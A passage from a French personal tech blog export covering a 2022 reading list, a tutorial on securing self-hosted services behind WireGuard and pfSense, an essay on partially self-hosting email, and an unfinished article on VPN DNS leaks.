n\u0026rsquo;aime pas trop le style d\u0026rsquo;écriture et il pourrait être plus court. Biographies # Next Stop Execution: The Autobiography of Oleg Gordievsky (Oleg Gordievsky) L\u0026rsquo;histoire de l\u0026rsquo;agent du KGB le plus haut gradé ayant jamais travaillé pour le Royaume-Uni, de ses débuts à sa folle évasion de l\u0026rsquo;URSS. The Billion Dollar Spy: A True Story of Cold War Espionage and Betrayal (David E. Hoffman) L\u0026rsquo;histoire d\u0026rsquo;Adolf Tolkachev, un ingénieur dans un bureau de conception militaire soviétique qui a partagé une quantité considérable d\u0026rsquo;informations avec la CIA, contribuant à la domination militaire des États-Unis pendant la guerre froide. The Splendid and the Vile: A Saga of Churchill, Family, and Defiance During the Blitz (Erik Larson) \u0026ldquo;Grâce à l\u0026rsquo;utilisation remarquablement habile de journaux intimes ainsi que de documents publics, dont certains récemment déclassifiés, Larson a transformé le récit bien connu de 12 mois tumultueux, s\u0026rsquo;étendant de mai 1940 à mai 1941, en un livre frais, rapide et profondément émouvant.\u0026rdquo; - Candice Millard, The New York Times Book Review Shoe Dog: A Memoir by the Creator of Nike (Phil Knight) Comment Nike a été créé et a grandi pour devenir ce qu\u0026rsquo;il est aujourd\u0026rsquo;hui L\u0026rsquo;éclaireur (Sergueï Jirnov) L\u0026rsquo;autobiographie d\u0026rsquo;un ex-agent du KGB qui était en voie d\u0026rsquo;infiltrer le sommet de l\u0026rsquo;administration française avant l\u0026rsquo;effondrement de l\u0026rsquo;URSS et son départ du service. La majeure partie du livre concerne la façon dont l\u0026rsquo;auteur est devenu un illégal et a été formé (en français uniquement) Profession espion (Olivier Mas) Un ex-agent de la DGSE parlant de ses années de service. Une bonne lecture, mais n\u0026rsquo;attendez pas à apprendre quelque chose de révolutionnaire (en français uniquement) Histoire # Rogue Heroes: The History of the SAS, Britain\u0026rsquo;s Secret Special Forces Unit That Sabotaged the Nazis and Changed the Nature of War (Ben Macintyre) L\u0026rsquo;histoire brillamment narrée de la création du Special Air Service britannique et de certaines de leurs opérations pendant la Seconde Guerre mondiale. Black Flags: The Rise of ISIS (Joby Warrick) \u0026ldquo;Un récit révélateur, captivant et exquisément détaillé de la vie et de la mort de Zarqawi, l\u0026rsquo;improbable cerveau terroriste, et de la montée du mouvement désormais connu sous le nom d\u0026rsquo;État islamique (aussi connu sous le nom d\u0026rsquo;ISIS).\u0026rdquo; - San Francisco Chronicle Les espions de la terreur (Matthieu Suc) Une enquête sur les services secrets de l\u0026rsquo;ISIS (disponible uniquement en français) Prisoners of the Castle: An Epic Story of Survival and Escape from Colditz, the Nazis\u0026rsquo; Fortress Prison (Ben Macintyre) Un autre excellent livre de Macintyre paru cette année. (\u0026ldquo;The Spy and the Traitor\u0026rdquo; et \u0026ldquo;Agent Sonya\u0026rdquo; restent mes préférés cependant ; je les recommande vivement) The Mitrokhin Archive: The KGB in Europe and the West (Christopher Andrew) Un livre basé sur des archives exfiltrées du KGB. Beaucoup d\u0026rsquo;informations intéressantes mais une bonne partie de la lecture peut être assez laborieuse car on a l\u0026rsquo;impression de se faire bombarder de noms et de dates. Je ne lirai probablement pas le second volume (\u0026ldquo;The KGB \u0026amp; the Battle for the Third World\u0026rdquo;) tout de suite. KGB - La véritable histoire des services secrets soviétiques (Bernard Lecomte) Une histoire du KGB de sa création à sa mort (en français uniquement). Moins d\u0026rsquo;informations que les archives Mitrokhin, mais beaucoup plus agréable à lire. Carrière # Ayant la chance de connaître une certaine progression de carrière ces derniers temps, j\u0026rsquo;ai trouvé que ces deux livres donnaient des conseils utiles.\nStaff Engineer: Leadership Beyond the Management Track (Will Larson) The Manager\u0026rsquo;s Path: A Guide for Tech Leaders Navigating Growth and Change (Camille Fournier) Finance # Central Banking 101 (Joseph J. Wang) Ce livre offre des explications claires pour aider à comprendre le fonctionnement du système financier et de la création monétaire The Millionaire Fastlane: Crack the Code to Wealth and Live Rich for a Lifetime! (M.J. DeMarco) Malgré ce que le titre peut suggérer, ce n\u0026rsquo;est pas un livre arnaque sur \u0026ldquo;comment devenir riche rapidement et sans effort\u0026rdquo;. L\u0026rsquo;auteur avance de bons arguments mais est un peu trop répétitif par moments True Crime # Freezing Order: A True Story of Money Laundering, Murder, and Surviving Vladimir Putin\u0026rsquo;s Wrath (Bill Browder) Un livre révélant des fraudes financières liées à des officiels russes, et le combat qui s\u0026rsquo;ensuivit pour geler les actifs concernés Spam Nation: The Inside Story of Organized Cybercrime - from Global Epidemic to Your Front Door (Brian Krebs) \u0026ldquo;Un regard fascinant et quelque peu décourageant sur les raisons pour lesquelles le spam est si courant\u0026hellip; les lecteurs de Spam Nation ne regarderont plus jamais le spam dans leur boîte de réception de la même façon.\u0026rdquo; - USA Today Divers # Chinese Espionage: Operations and Tactics (Nicholas Eftimiades) Je ne lis généralement pas beaucoup sur l\u0026rsquo;espionnage chinois, j\u0026rsquo;ai donc trouvé ce livre intéressant, bien qu\u0026rsquo;assez court. Four Thousand Weeks: Time Management for Mortals (Oliver Burkeman) C\u0026rsquo;était agréable de lire un livre parlant de gestion du temps qui ne vous assène pas de \u0026ldquo;conseils\u0026rdquo; de productivité toxiques ou vides de sens les uns après les autres. 21 Lessons for the 21st Century (Yuval Noah Harari) \u0026ldquo;Dans Sapiens, il a exploré notre passé. Dans Homo Deus, il s\u0026rsquo;est tourné vers notre avenir. Maintenant, [Harari] se tourne vers le présent.\u0026rdquo; Les trois livres sont excellents, mais mon préféré reste le premier. Crédits # Photo de couverture par Dmitrij Paskevic ","date":"2022-12-17","externalUrl":null,"permalink":"/fr/posts/2022/best-books-i-have-read-2022/","section":"Articles","summary":"Quelques-uns des livres que j’ai le plus appréciés en 2022 (informatique, sciences et autres catégories)","title":"Les 32 meilleurs livres que j'ai lus en 2022","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nL\u0026rsquo;auto-hébergement est formidable, mais il y a un problème : plus vous installez de nouveaux services, plus vous créez de surface d\u0026rsquo;attaque sur votre serveur, et plus vous devez être vigilant concernant les mises à jour et autres si vous ne voulez pas risquer d\u0026rsquo;être piraté.\nDans cet article, nous allons discuter d\u0026rsquo;un moyen d\u0026rsquo;apporter plus de sécurité à vos services auto-hébergés et d\u0026rsquo;être moins stressé par les mises à jour urgentes en ne les exposant pas à Internet tout en permettant un accès facile. Pour y parvenir, nous configurerons un serveur WireGuard, verrons comment s\u0026rsquo;y connecter, empêcherons les utilisateurs non connectés d\u0026rsquo;accéder à vos services, et nous assurerons que toutes les machines de votre réseau local peuvent accéder aux services hébergés sur votre serveur en utilisant pfSense.\nNotez que je supposerai que votre serveur VPN et les services que vous voulez protéger sont sur le même serveur. Si ce n\u0026rsquo;est pas le cas, vous devriez ajuster un peu la configuration du pare-feu.\nInstaller le serveur WireGuard # La première étape est d\u0026rsquo;installer le serveur WireGuard et de générer une paire de clés publique/privée.\nsudo apt-get install wireguard cd /etc/wireguard umask 077 wg genkey \u0026gt; wg0.key wg pubkey \u0026lt; wg0.key \u0026gt; wg0.pub Nous pouvons ensuite créer un fichier /etc/wireguard/wg0.conf avec la configuration suivante. Nous utilisons le champ Address pour définir que les IP des clients connectés au VPN seront entre 10.90.0.2 et 10.90.0.254, mais vous pouvez utiliser ce que vous voulez (faites juste attention à ne pas utiliser une plage déjà utilisée).\n[Interface] PostUp = wg set %i private-key /etc/wireguard/%i.key Address = 10.90.0.1/24 ListenPort = 51822 Une fois cela fait, nous ajoutons un service systemd, démarrons le serveur et vérifions qu\u0026rsquo;il fonctionne correctement :\nsudo systemctl enable wg-quick@wg0.service sudo systemctl start wg-quick@wg0.service sudo systemctl status wg-quick@wg0.service Dans notre cas, nous ne voulons pas utiliser le VPN pour accéder à Internet, nous devons donc simplement ouvrir le port WireGuard pour que les clients puissent se connecter au serveur\nsudo iptables -t filter -A INPUT -p udp --dport 51822 -j ACCEPT Si vous voulez pouvoir utiliser le VPN pour vous connecter à Internet, les commandes suivantes devraient fonctionner (eth0 doit être remplacé par le nom de l\u0026rsquo;interface que vous utilisez pour vous connecter à Internet)\nsudo sysctl -w net.ipv4.ip_forward=1 sudo iptables -t nat -A POSTROUTING -s 10.90.0.0/24 -o eth0 -j MASQUERADE Configurer un client # Configuration côté client # Maintenant, nous voulons tester si nous pouvons correctement nous connecter à notre serveur. Avec le client WireGuard, cliquer sur Add Empty Tunnel... devrait vous donner l\u0026rsquo;écran suivant (le client générera automatiquement une paire de clés pour vous).\nAjout d\u0026rsquo;un tunnel vide depuis le client WireGuard Nous allons modifier la configuration pour qu\u0026rsquo;elle ressemble à ce qui suit (remplacez A.B.C.D par l\u0026rsquo;IP de votre serveur)\n[Interface] PrivateKey = KCMvn8yRUHBhI5RbIr/iZJn4X3BvjwsNdLmEDKFIaGg= Address = 10.90.0.2/32 [Peer] PublicKey = [Collez le contenu du fichier /etc/wireguard/wg0.pub du serveur] AllowedIPs = 10.90.0.0/24 Endpoint = A.B.C.D:51822 PersistentKeepalive = 25 Address sera l\u0026rsquo;IP de votre client dans le réseau VPN. L\u0026rsquo;option AllowedIPs nous permet de dire quelles adresses IP doivent être atteintes via le VPN. Ici, nous voulons juste accéder au réseau VPN, mais si nous voulions tout router via le VPN, nous devrions écrire 0.0.0.0/0.\nSauvegardez la configuration, mais la connexion ne fonctionnera pas encore, car nous devons autoriser notre client dans la configuration du serveur.\nConfiguration côté serveur # La configuration côté serveur est assez légère. Nous devons simplement éditer notre fichier /etc/wireguard/wg0.conf et ajouter les lignes suivantes :\n[Peer] PublicKey = eF3ZRuLDG9Ih5yxTFLyGyosx4qlAvad388ITieSwL34= AllowedIPs = 10.90.0.2/32 AllowedIPs est l\u0026rsquo;adresse que nous voulons attribuer au client (ici 10.90.0.2) et la clé publique est celle que le client WireGuard a générée pour nous.\nUne fois la configuration sauvegardée, nous devons redémarrer le serveur, et nous devrions ensuite pouvoir nous y connecter.\n# Côté serveur sudo systemctl restart wg-quick@wg0.service # Côté client pour tester la connexion ping 10.90.0.1 curl http://10.90.0.1 # Si vous avez un serveur web en cours d\u0026#39;exécution Si vous ne voulez pas redémarrer le serveur WireGuard, vous avez la possibilité d\u0026rsquo;utiliser la commande wg. Notez que cela ne sauvegardera rien, vous devez donc toujours éditer le fichier de configuration. Sinon, la configuration sera perdue au prochain redémarrage du serveur.\n# Pour ajouter un client wg set wg0 peer \u0026#34;eF3ZRuLDG9Ih5yxTFLyGyosx4qlAvad388ITieSwL34=\u0026#34; allowed-ips 10.90.0.2/32 # Pour supprimer un client wg set wg0 peer \u0026#34;eF3ZRuLDG9Ih5yxTFLyGyosx4qlAvad388ITieSwL34=\u0026#34; remove Tirer parti de WireGuard # Maintenant que nous avons un serveur fonctionnel, nous pouvons faire en sorte que les services ne soient pas accessibles depuis le monde extérieur.\nLa manière la plus sécurisée de gérer les choses serait de n\u0026rsquo;ouvrir les ports INPUT que pour SSH et WireGuard, car cela laisse très peu de surface d\u0026rsquo;attaque. Nous pouvons ensuite accéder à nos services à l\u0026rsquo;IP 10.90.0.1.\nMais disons que nous voulons partager quelque chose avec un tiers sans lui demander d\u0026rsquo;avoir un accès VPN. Pour ce genre de scénario, j\u0026rsquo;expose mon instance Apache à Internet, mais j\u0026rsquo;utilise la configuration Apache suivante dans mon Virtual Host. Elle exige soit d\u0026rsquo;être connecté via le VPN, soit de se connecter avec un utilisateur du groupe mygroup.\n\u0026lt;Location /\u0026gt; Require all denied AuthType Basic AuthName \u0026#34;Password Required\u0026#34; AuthUserFile \u0026#34;/path/to/htpasswd\u0026#34; AuthGroupFile \u0026#34;/path/to/htgroup\u0026#34; \u0026lt;RequireAny\u0026gt; Require ip 10.90.0.0/24 Require group mygroup \u0026lt;/RequireAny\u0026gt; \u0026lt;/Location\u0026gt; Cela a l\u0026rsquo;avantage de ne pas m\u0026rsquo;embêter avec le BasicAuth quand j\u0026rsquo;utilise le serveur, tout en réduisant le risque que des acteurs malveillants exploitent quelque chose puisque c\u0026rsquo;est derrière un mot de passe.\nConfiguration de pfSense # Tout cela est très bien, mais configurer WireGuard sur tous nos appareils est ennuyeux. Et si nous pouvions faire en sorte que tous les appareils de notre réseau domestique puissent accéder aux services que vous hébergez sur votre serveur ?\nSi vous avez pfSense, vous pouvez effectivement le faire en créant un tunnel WireGuard et en faisant un peu de configuration de routage. (Vous pourriez aussi être intéressé par cet article sur la configuration de pfSense.)\nConfigurer un tunnel WireGuard # D\u0026rsquo;abord, nous allons dans System/Package Manager/Available Packages et installons WireGuard.\nEnsuite, nous configurerons la connexion dans VPN/WireGuard/Tunnels. Cliquez sur Add Tunnel, mettez l\u0026rsquo;adresse de l\u0026rsquo;interface comme 10.90.0.3/32 et générez une paire de clés. Sauvegardez l\u0026rsquo;interface, et connectez-vous à votre serveur pour ajouter un client avec cette clé publique et cette adresse IP (voir la partie précédente Configurer un client/Configuration côté serveur).\nVPN / WireGuard / Tunnels / Add Tunnel Après avoir créé l\u0026rsquo;interface, nous devrions voir cet écran dans la liste des tunnels.\nVPN / WireGuard / Tunnels Nous cliquerons ensuite sur l\u0026rsquo;icône Add Peer dans la colonne Actions et configurerons le Peer comme suit.\nVPN / WireGuard / Peers / Add Peer Sauvegardez et appliquez les modifications. N\u0026rsquo;oubliez pas non plus d\u0026rsquo;aller dans le menu Settings et d\u0026rsquo;activer WireGuard. Quand tout cela est fait, nous devrions pouvoir confirmer que le tunnel fonctionne dans le menu Status / Wireguard.\nRouter le trafic pertinent à travers WireGuard # Maintenant que nous avons un tunnel fonctionnel, nous voulons rediriger tout le trafic vers 10.90.0.0/24.\nNous créerons une interface nommée WG1 dans Interfaces / Interface Assignments et la configurerons comme suit :\nInterfaces / Interface Assignments Interfaces / WG1 Notez que nous devons créer la passerelle en cliquant sur Add a new gateway et en lui donnant l\u0026rsquo;IP 10.90.0.3. Quand la modification de l\u0026rsquo;interface est sauvegardée, nous pouvons aller dans System / Routing / Gateways et confirmer qu\u0026rsquo;elle a été correctement créée.\nSystem / Routing / Gateways Nous créerons ensuite une règle NAT sortante dans Firewall / NAT / Outbound. Nous devons nous assurer que cette règle est avant celles des interfaces atteignant Internet.\nFirewall / NAT / Outbound rule Enfin, dans Firewall / Rules / LAN, nous ajouterons la règle suivante. Comme pour le NAT, nous devons nous assurer qu\u0026rsquo;elle est avant vos règles redirigeant le trafic vers les passerelles WAN et VPN.\nFirewall / Rules / LAN -\u0026gt; nouvelle règle Résolveur DNS # Si vous utilisez quelque chose de similaire à la configuration Apache que j\u0026rsquo;ai mentionnée précédemment, vous aurez un petit problème : votre entrée DNS pointera vers l\u0026rsquo;adresse IP du serveur plutôt que vers l\u0026rsquo;adresse VPN interne. Un moyen de corriger cela est d\u0026rsquo;utiliser le résolveur DNS de pfSense. Par exemple, si vous voulez que git.me.com et calendar.me.com soient atteints via le réseau VPN, vous pouvez ajouter un Host Override et le configurer comme suit.\nServices / DNS Resolver / General Settings / Host Override Sources # Using the VPN as the default gateway (Ubuntu doc) Wireguard Client Addition without restart (ServerFault) Crédits # Image de couverture par Peter Albanese sur Unsplash ","date":"2022-12-11","externalUrl":null,"permalink":"/fr/posts/2022/protect-self-hosted-services-wireguard-vpn-server-pfsense/","section":"Articles","summary":"Apprenez à exiger une connexion VPN WireGuard pour pouvoir accéder aux services hébergés sur votre serveur, et autorisez votre réseau domestique avec pfSense","title":"Comment protéger vos services auto-hébergés derrière WireGuard","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nAu fil des années, j\u0026rsquo;ai géré mes emails de nombreuses façons différentes : Gmail et consorts, 100 % auto-hébergé, et hébergement tiers avec mes propres noms de domaine (avec des emails standard et des emails \u0026ldquo;E2E\u0026rdquo; chiffrés). Récemment, j\u0026rsquo;ai commencé à utiliser un service tiers pour recevoir et envoyer des emails, et à héberger mon propre serveur IMAP pour les stocker. Dans cet article, j\u0026rsquo;expliquerai comment j\u0026rsquo;en suis arrivé à cette solution, pourquoi je pense qu\u0026rsquo;elle est bonne (du moins pour mon cas d\u0026rsquo;usage), et je présenterai plusieurs avantages et inconvénients des principales solutions existantes.\nLa genèse : les fournisseurs de messagerie grand public # Comme la plupart des gens, mes premiers comptes email étaient chez des fournisseurs de messagerie grand public. Le tout premier était Yahoo si je me souviens bien. Ensuite, j\u0026rsquo;en ai obtenu plusieurs autres avec différents services ; tous utilisaient le domaine du fournisseur (c\u0026rsquo;est-à-dire moi@yahoo.com, \u0026hellip;)\nAujourd\u0026rsquo;hui, je ne recommanderais pas aux gens de faire cela. Utiliser un fournisseur de messagerie et une adresse email qui lui appartient signifie que l\u0026rsquo;adresse n\u0026rsquo;est jamais vraiment la vôtre : si le fournisseur décide qu\u0026rsquo;il ne veut plus s\u0026rsquo;occuper de vous, il peut fermer arbitrairement votre compte, et vous n\u0026rsquo;avez aucun recours. Vous perdrez potentiellement tous vos emails (sauf si vous avez des sauvegardes correctes - pour cela je recommande simplement d\u0026rsquo;utiliser Thunderbird pour garder une copie locale hors ligne de toute votre boîte mail) et passerez un très mauvais moment car vos comptes sont liés à cette adresse email que vous ne pouvez plus consulter.\nUn moyen de réduire le risque est d\u0026rsquo;obtenir votre propre nom de domaine et de l\u0026rsquo;utiliser pour recevoir des emails (par exemple johnsmith@mondomaine.com plutôt que johnsmith@gmail.com). De cette façon, même si Google décide qu\u0026rsquo;il ne vous aime pas, vous pouvez rediriger votre domaine vers un autre fournisseur, et conserver la même adresse email. Certes, un nom de domaine ne vous appartient jamais vraiment non plus, vous ne faites que le louer, mais si vous prenez soin du renouvellement correctement, il est très peu probable que vous le perdiez.\nSi vous obtenez votre propre nom de domaine, je ne recommanderais toutefois pas d\u0026rsquo;utiliser Google, Outlook et consorts pour héberger vos emails, car ils ont un historique de lecture de vos emails, et de référencement des liens qu\u0026rsquo;ils contiennent dans les moteurs de recherche, \u0026hellip; Si vous décidez que la vie privée ne vous importe pas, ils fonctionnent cependant très bien.\nL\u0026rsquo;escalade rapide : l\u0026rsquo;auto-hébergement # À un moment donné, j\u0026rsquo;ai acquis suffisamment de compétences techniques et j\u0026rsquo;ai décidé que je voulais avoir plus de contrôle sur mes emails, alors j\u0026rsquo;ai acheté quelques noms de domaine et configuré mon propre serveur de messagerie. Certes, cela a pris un temps considérable à gérer, mais c\u0026rsquo;était une excellente expérience d\u0026rsquo;apprentissage, et j\u0026rsquo;ai découvert les joies d\u0026rsquo;avoir un domaine catch-all me permettant de facilement créer une adresse email par service. Après quelques années, cependant, j\u0026rsquo;en ai eu assez de la charge de maintenance et j\u0026rsquo;ai décidé d\u0026rsquo;arrêter. Ce que j\u0026rsquo;ai retenu de cette période :\nSi vous avez votre propre serveur de messagerie, vous passerez beaucoup de temps à le maintenir, et cela coûtera plus cher qu\u0026rsquo;utiliser un service tiers Même si vous faites les choses correctement, vous devrez faire face au spam, à vos emails arbitrairement rejetés par les gros services, aux pannes logicielles, \u0026hellip; Vous devez soit maintenir et payer pour plusieurs serveurs, soit accepter que si votre serveur plante, cela peut causer divers degrés de désagrément Par défaut, ce n\u0026rsquo;est pas forcément bon pour la vie privée. Si vous hébergez plusieurs domaines (par exemple un avec votre nom, et un non lié à vous), ils finiront par être associés ensemble sur les moteurs de recherche d\u0026rsquo;historique de domaines Vous pouvez choisir quels systèmes vous voulez installer et les personnaliser, mais la plupart des logiciels open source auront moins de fonctionnalités que ce que vous pourriez avoir en payant un service tiers Vous avez un contrôle total sur votre boîte mail, et personne d\u0026rsquo;autre ne peut théoriquement y accéder. (Enfin, votre hébergeur le pourrait théoriquement\u0026hellip; et le fournisseur des personnes qui vous envoient des emails\u0026hellip;) Prendre son temps : service d\u0026rsquo;hébergement de messagerie # Un jour, mon serveur de messagerie a subi un crash assez grave la veille de mon départ pour quelques semaines de vacances sans ordinateur, et ce fut la goutte d\u0026rsquo;eau qui m\u0026rsquo;a fait penser \u0026ldquo;OK, c\u0026rsquo;était sympa et tout, mais utilisons un fournisseur d\u0026rsquo;hébergement.\u0026rdquo;\nÀ partir de là, j\u0026rsquo;ai trouvé un service d\u0026rsquo;hébergement de messagerie avec une bonne réputation et en qui j\u0026rsquo;ai confiance pour ne pas envahir ma vie privée, et je l\u0026rsquo;utilise depuis des années. Par rapport à la maintenance d\u0026rsquo;un serveur, c\u0026rsquo;est moins cher, ne prend pas de temps, est plus fiable et plus convivial (en termes de fonctionnalités). Si jamais j\u0026rsquo;ai besoin d\u0026rsquo;utiliser un autre fournisseur de messagerie, il me faut littéralement 5 minutes pour modifier mes entrées DNS.\nCertes, il y a une certaine perte de vie privée (bien qu\u0026rsquo;il ne soit désormais plus facile de relier mes multiples noms de domaine ensemble), mais un grand gain de commodité (et c\u0026rsquo;est quand même bien mieux qu\u0026rsquo;Outlook ou autre).\nService chiffré E2E # Après quelques années, je me suis dit : \u0026ldquo;Mon fournisseur de messagerie est bien et je n\u0026rsquo;ai aucune plainte. Mais que se passerait-il s\u0026rsquo;ils étaient piratés ? J\u0026rsquo;aurais des années d\u0026rsquo;emails dans la nature. Essayons d\u0026rsquo;utiliser un fournisseur qui stocke les emails chiffrés de bout en bout.\u0026rdquo; J\u0026rsquo;en ai essayé un pendant un moment (ProtonMail), j\u0026rsquo;ai encore réfléchi, et je ne suis pas convaincu.\nMon avis sur les fournisseurs de messagerie E2E est :\nVous perdrez beaucoup de fonctionnalités par rapport à une boîte mail normale (par exemple un moteur de recherche fonctionnel) Vous paierez beaucoup plus pour moins (par exemple un nombre très limité de noms de domaine que vous pouvez lier à votre compte) La plupart (tous ?) n\u0026rsquo;ont soit aucun moyen d\u0026rsquo;importer/exporter des emails avec IMAP (ou pas du tout), soit c\u0026rsquo;est peu fiable, buggé et/ou peu pratique Si le fournisseur vous vend du \u0026ldquo;Nous sommes en Suisse donc vous êtes tranquille contre tout espionnage\u0026rdquo;, je n\u0026rsquo;y croirais pas Certes, vos emails sont chiffrés, mais ils ne le seront qu\u0026rsquo;après que votre fournisseur les a reçus et traités. Même alors, le sujet, l\u0026rsquo;expéditeur et le destinataire ne seront pas chiffrés, ce qui suffit à deviner beaucoup de choses Ils peuvent cependant rendre les conversations chiffrées PGP avec des personnes utilisant le même service que vous plus faciles que de le gérer manuellement Surtout considérant que je n\u0026rsquo;utilise généralement pas les emails pour avoir des conversations ou envoyer des choses excessivement sensibles, tous les inconvénients n\u0026rsquo;ont tout simplement pas de sens pour mon usage face aux quelques avantages.\nServeur IMAP auto-hébergé + service d\u0026rsquo;hébergement de messagerie # Après mon essai peu concluant d\u0026rsquo;un service de messagerie chiffré E2E, j\u0026rsquo;ai simplement pensé à une autre solution que j\u0026rsquo;expérimente actuellement :\nJ\u0026rsquo;utilise des fournisseurs tiers pour recevoir et envoyer des emails avec mes noms de domaine J\u0026rsquo;ai un serveur IMAP uniquement avec Dovecot que j\u0026rsquo;utilise pour stocker et accéder à mes emails Chaque semaine, je transfère mes emails du fournisseur tiers vers mon serveur IMAP (pour certaines boîtes mail que j\u0026rsquo;utilise uniquement pour recevoir des emails, je les récupère automatiquement avec getmail) Les bons côtés de cette solution sont que :\nJe peux facilement accéder à mes emails depuis n\u0026rsquo;importe lequel de mes appareils (si ce n\u0026rsquo;était pas ce que je voulais, j\u0026rsquo;aurais simplement configuré mon client de messagerie en POP3 et tout gardé en local sur un seul appareil) Les fournisseurs de messagerie n\u0026rsquo;ont qu\u0026rsquo;un nombre limité de mes emails à un moment donné, ce qui signifie qu\u0026rsquo;en cas de piratage, d\u0026rsquo;employé indiscret, ou autre, j\u0026rsquo;aurais probablement une exposition de données limitée Si j\u0026rsquo;ai une boîte mail que je ne veux pas relier à moi, c\u0026rsquo;est très facile de l\u0026rsquo;ajouter à ma configuration getmail et d\u0026rsquo;avoir son contenu rapatrié dans ma boîte Une configuration IMAP Dovecot est facile à maintenir et ne nécessite pas énormément de temps. Si le serveur tombe, je n\u0026rsquo;ai pas besoin de me précipiter pour le réparer car l\u0026rsquo;impact serait très limité Sources et crédits # Photo de couverture par Krsto Jevtic\n","date":"2022-11-14","externalUrl":null,"permalink":"/fr/posts/2022/why-i-partially-self-host-my-emails-and-why-pgp-e2e-email-provider-useless/","section":"Articles","summary":"Au fil des années, j’en suis arrivé à la conclusion que la meilleure façon de gérer ses emails est d’avoir son propre nom de domaine, un serveur IMAP, et d’utiliser un tiers pour le SMTP","title":"Pourquoi j'auto-héberge (partiellement) mes emails et n'utilise pas de fournisseur de messagerie E2E","type":"posts"},{"content":"Avertissement : Cet article a été traduit de l\u0026rsquo;anglais par un LLM. La précision n\u0026rsquo;est pas garantie. Vous pouvez lire l\u0026rsquo;article original en anglais.\nSi vous utilisez un VPN, vous pensez peut-être : \u0026ldquo;Mon FAI n\u0026rsquo;a aucune idée de ce que je fais, et personne ne peut me tracer.\u0026rdquo; Cela pourrait cependant ne pas être tout à fait vrai en raison d\u0026rsquo;un problème courant des VPN : les fuites DNS. Dans cet article, nous verrons ce qu\u0026rsquo;elles sont, quelles sont leurs conséquences, comment les détecter, et quelques-unes des causes les plus courantes de fuites.\nQue sont les fuites DNS et quelles sont leurs conséquences ? # La figure suivante montre ce qui se passe quand votre VPN fonctionne correctement par rapport à quand il y a une fuite DNS. Dans le premier cas, vous pouvez voir que le serveur DNS est atteint via le VPN. De ce fait, il n\u0026rsquo;est pas possible pour votre FAI de voir vos requêtes DNS (qui ne sont pas chiffrées). À moins que vous n\u0026rsquo;utilisiez le serveur DNS fourni par votre fournisseur VPN, le propriétaire dudit serveur ne pourra pas savoir que c\u0026rsquo;est vous qui essayez de résoudre mysite.com.\nDans le cas où vous avez une fuite DNS, votre ordinateur se connectera au serveur DNS sans utiliser le VPN, ce qui signifie que votre FAI et le propriétaire du serveur DNS (par défaut le FAI) pourront voir les sites que vous essayez de résoudre.\nNormal VPN operation vs DNS leak Selon la raison pour laquelle vous utilisez un VPN, les fuites DNS peuvent être plus ou moins graves. Si vous êtes dans un pays gouverné par un régime autoritaire et que vous essayez d\u0026rsquo;accéder à des sites censurés, alors les autorités pourraient voir que vous avez accédé à ces sites et vous causer des problèmes. Si vous utilisez simplement un VPN pour télécharger votre distribution Linux préférée par torrent, alors ce sera relativement inoffensif.\nComment tester les fuites DNS # Services tiers, et comment ils fonctionnent # Tester les fuites DNS est assez simple. Vous pouvez utiliser des sites web comme dnsleaktest.com ou ipleak.net. Chacun d\u0026rsquo;eux affichera votre adresse IP actuelle et le serveur DNS que vous utilisez. Ma recommandation est d\u0026rsquo;utiliser le DNS de votre fournisseur VPN. La raison est qu\u0026rsquo;il voit déjà tout votre trafic, donc il n\u0026rsquo;y a pas d\u0026rsquo;intérêt à ajouter un autre intermédiaire pour la résolution de noms de domaine. Si vous suivez cette recommandation, vous devriez voir le DNS de votre fournisseur VPN listé, et rien d\u0026rsquo;autre.\nLa façon dont ipleak.net et les sites similaires fonctionnent pour déterminer quels serveurs DNS vous utilisez est assez simple. Lorsque vous chargez la page, ils vous attribuent un identifiant utilisateur unique. Par exemple, abcd123. À partir de là, ils effectueront plusieurs requêtes vers une API située à un sous-domaine contenant votre identifiant unique. Par exemple :\nhttps://abcdefg123-1.ipleak.net/dnsdetection https://abcdefg123-2.ipleak.net/dnsdetection https://abcdefg123-3.ipleak.net/dnsdetection Cette API renverra l\u0026rsquo;adresse IP du serveur DNS qui a effectué la requête. La raison pour laquelle ils font plusieurs appels est de pouvoir détecter tous vos serveurs DNS si vous en avez plus d\u0026rsquo;un.\nCela ne répond pas à la question de comment Ipleak connaît l\u0026rsquo;adresse de votre serveur DNS. La façon dont ils gèrent cela est la suivante : puisque le sous-domaine (par exemple abcdefg123-1.ipleak.net) que vous essayez d\u0026rsquo;atteindre via l\u0026rsquo;API est assez unique, il n\u0026rsquo;y a aucune chance qu\u0026rsquo;il soit stocké dans votre cache DNS ou que quelqu\u0026rsquo;un d\u0026rsquo;autre essaie de le résoudre en même temps. Cela signifie que vous devrez demander au serveur DNS faisant autorité d\u0026rsquo;Ipleak de résoudre le sous-domaine pour vous. Ce faisant, votre serveur DNS contactera le serveur DNS d\u0026rsquo;Ipleak qui enregistrera l\u0026rsquo;IP faisant la requête et la stockera pour qu\u0026rsquo;elle soit accessible par l\u0026rsquo;API.\nInspection des paquets # Utiliser des services en ligne pour tester les fuites DNS est pratique, mais parfois les résultats peuvent être peu clairs. Par exemple, si vous utilisez un serveur DNS non standard, comment être sûr que vous vous connectez audit serveur via votre VPN et pas directement ?\nDans ce cas, vous pouvez utiliser Wireshark pour voir les paquets qui quittent réellement votre ordinateur. Il vous suffit de sélectionner vos interfaces WiFi et/ou Ethernet, et de capturer les paquets qui transitent. Dans le filtre d\u0026rsquo;affichage, entrez dns pour que seules les requêtes pertinentes s\u0026rsquo;affichent. Ensuite, essayez de faire des requêtes vers des domaines aléatoires. Si rien n\u0026rsquo;apparaît dans les paquets capturés, félicitations, cela signifie que les requêtes DNS sont routées via votre adaptateur VPN et ne fuient pas. Sinon, vous devez inspecter votre configuration.\nDNS visible when capturing eth0 -\u0026gt; DNS leak Quelles sont les causes des fuites DNS # Bien que l\u0026rsquo;utilisation de la configuration VPN standard fournie par un fournisseur réputé devrait empêcher les fuites DNS, il y a plusieurs choses qui peuvent les causer. Parmi les plus courantes :\nLes proxys transparents Les tunnels DNS divisés Une configuration de routage réseau inhabituelle La résolution de noms Smart Multi-Homed de Windows Un exemple concret serait si vous utilisez votre propre résolveur DNS avec pfSense (voir mon article précédent). Dans ce cas, oublier de définir les Outgoing Network Interfaces sur votre interface VPN causera des fuites DNS.\nConclusion # Les fuites DNS peuvent permettre à votre FAI et au propriétaire du serveur DNS que vous utilisez de tracer votre activité web 